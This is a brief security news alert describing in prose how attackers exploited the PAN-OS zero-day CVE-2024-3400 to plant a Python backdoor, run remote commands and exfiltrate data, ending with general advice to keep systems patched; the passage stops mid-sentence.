Python Backdoor Utilised by Hackers in Zero-Day Attack on Palo Alto Networks

16.04.24

Threat Intelligence Alerts

Threat actors exploited a newly disclosed zero-day flaw in Palo Alto Networks PAN-OS software. This flaw, tracked as CVE-2024-3400, is a command injection flaw that allows unauthenticated attackers to execute arbitrary code with root privileges on the firewall. The exploitation of this flaw has been named Operation MidnightEclipse.

The attackers exploited the flaw to create a cron job that runs every minute to fetch commands hosted on an external server. These commands are then executed using the bash shell. It’s suspected that the URL serves as a delivery vehicle for a Python-based backdoor on the firewall. The Python file writes and launches another Python script, which decodes and runs the embedded backdoor component responsible for executing the threat actor’s commands.

The exact scale of the campaign is presently unclear. However, it was observed that the threat actor remotely exploited the firewall to create a reverse shell, download additional tooling, pivot into internal networks, and ultimately exfiltrate data.

The most interesting aspect of the attack chain is that both the files used to extract the commands and write the results are legitimate files associated with the firewall. The main goal appears to be to avoid leaving traces of the command outputs, necessitating that the results are exfiltrated within 15 seconds before the file is overwritten.

This incident highlights the importance of staying vigilant and keeping systems up-to-date to protect against such vulnerabilities. Businesses should ensure they have robust cybersecurity measures in place and educate